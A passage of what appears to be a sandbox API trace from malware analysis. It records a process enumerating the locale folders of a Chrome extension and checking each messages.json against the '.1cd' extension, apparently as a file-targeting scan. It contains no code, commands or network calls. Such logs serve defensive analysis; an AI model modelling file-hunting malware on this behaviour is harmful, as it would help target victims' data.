dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.790] lstrlenW (lpString="messages.json") returned 13 [0052.790] lstrlenW (lpString=".1cd") returned 4 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.790] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.790] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0052.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he") returned 139 [0052.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.790] lstrlenW (lpString="messages.json") returned 13 [0052.790] lstrlenW (lpString=".1cd") returned 4 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.791] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.791] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0052.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi") returned 139 [0052.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.791] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.791] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.791] lstrlenW (lpString="messages.json") returned 13 [0052.791] lstrlenW (lpString=".1cd") returned 4 [0052.791] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.791] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.791] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0052.791] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr") returned 139 [0052.791] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.791] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.791] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.792] lstrlenW (lpString="messages.json") returned 13 [0052.792] lstrlenW (lpString=".1cd") returned 4 [0052.792] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.792] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.792] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.792] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0052.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu") returned 139 [0052.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.792] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.792] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.792] lstrlenW (lpString="messages.json") returned 13 [0052.792] lstrlenW (lpString=".1cd") returned 4 [0052.792] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.793] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.793] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.793] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0052.793] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 139 [0052.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.793] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.793] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.793] lstrlenW (lpString="messages.json") returned 13 [0052.793] lstrlenW (lpString=".1cd") returned 4 [0052.793] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.793] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.793] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.793] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0052.794] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 139 [0052.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.794] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.794] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.795] lstrlenW (lpString="messages.json") returned 13 [0052.795] lstrlenW (lpString=".1cd") returned 4 [0052.795] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.795] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.795] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.795] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0052.795] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja") returned 139 [0052.795] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1700 [0052.795] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264230, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85264230, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.795] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.795] lstrlenW (lpString="messages.json") returned 13 [0052.795] lstrlenW (lpString=".1cd") returned 4 [0052.795] FindNextFileW (in: hFindFile=0x3ef1700, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85264a00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.795] FindClose (in: hFindFile=0x3ef1700 | out: hFindFile=0x3ef1700) returned 1 [0052.796] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.796] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: 